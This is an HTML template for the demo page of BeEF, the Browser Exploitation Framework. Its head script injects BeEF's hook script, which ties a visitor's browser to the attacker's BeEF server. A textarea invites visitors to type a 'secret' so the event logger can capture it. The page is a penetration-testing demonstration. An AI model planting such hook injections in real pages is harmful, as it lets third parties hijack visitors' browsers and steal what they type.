<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<!--
    Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
-->
<head>
	<title>BeEF Basic Demo</title>
	<script>
		var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
</head>

<body>
  <div style='font:12px tahoma,arial,helvetica,sans-serif; width: 450px; margin: 0 auto;' >

    <img src='<%= BeEF::Core::Configuration.instance.get("beef.http.web_ui_basepath") %>/media/images/beef.jpg' />

    <p>You should be hooked into <b>BeEF</b>.</p>
    <p>Have fun while your browser is working against you.</p>
    <p>These links are for demonstrating the "Get Page HREFs" command module:</p>
    <ul>
      <li><a href="https://beefproject.com" target="_blank">The Browser Exploitation Framework Project homepage</a>
      <li><a href="https://github.com/beefproject/beef/wiki" target="_blank">BeEF Wiki</a></li>
      <li><a href="http://browserhacker.com/" target="_blank">Browser Hacker's Handbook</a></li>
      <li><a href="https://slashdot.org/" target="_blank">Slashdot</a>
    </ul>

    <p>Have a go at the event logger. <label for="imptxt">Insert your secret here:</label></p>
    <p><textarea type="text" id="imptxt" name="Important Text" style='width: 400px; margin: 0 auto;'></textarea></p>
    <p>You can also load up a more <a href="butcher/index.html">advanced demo page</a>.</p>
  </div>
  <!-- UTF-8 characters for testing purposes: 牛肉 -->
</body>
</html>
